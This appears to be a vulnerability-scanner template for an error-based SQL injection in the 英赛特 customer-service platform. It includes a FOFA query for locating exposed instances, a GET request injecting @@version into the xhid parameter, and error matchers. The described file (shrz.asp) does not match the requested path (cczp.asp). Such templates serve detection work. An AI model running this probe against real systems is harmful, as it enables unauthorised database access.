## id: VEID-2026-11126
## name: 英赛特互联网客户服务平台 shrz.asp处 SQL注入漏洞
## author: hack007x
## severity: high
## tags: veid,sql,veid2026
## description: 英赛特互联网客户服务平台 shrz.asp处 SQL注入漏洞 ，攻击者可进行sql注入攻击获取数据库信息或者权限。
## affects: 英赛特互联网客户服务平台
## fofa-query: body="英赛特互联网客户服务平台"
## verification: true



GET /csccmise/cczp.asp?xhid=@@version HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}


#@ condition: and
#@ matcher: body contains "转换成数据类型 int 时失败"
#@ matcher: status_code == 500







# @VEIL-STAMP: cee2e7825dcbf79c3c187ff14c82b8e8a75b8343b8b0fe08ac9780f79e4ceb7f
